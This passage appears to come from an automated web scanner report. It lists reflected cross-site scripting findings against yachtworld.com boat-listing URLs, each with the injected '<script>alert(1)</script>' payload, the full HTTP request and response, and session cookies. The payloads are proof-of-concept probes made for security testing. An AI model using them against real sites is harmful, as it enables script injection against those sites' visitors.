http%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States3f083"><script>alert(1)</script>b717be1f98b&boat_id=2141315">
...[SNIP]...

3.108. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6337a"><script>alert(1)</script>1388dae81f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States?6337a"><script>alert(1)</script>1388dae81f8=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:52 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?6337a"><script>alert(1)</script>1388dae81f8=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States&boat_id=2141315">
...[SNIP]...

3.109. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4f9"><script>alert(1)</script>91ca0df6288 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdalecd4f9"><script>alert(1)</script>91ca0df6288/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdalecd4f9"><script>alert(1)</script>91ca0df6288/FL/United-States&boat_id=2255088">
...[SNIP]...

3.110. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb59c"><script>alert(1)</script>7529dd0e55 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FLeb59c"><script>alert(1)</script>7529dd0e55/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:42 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
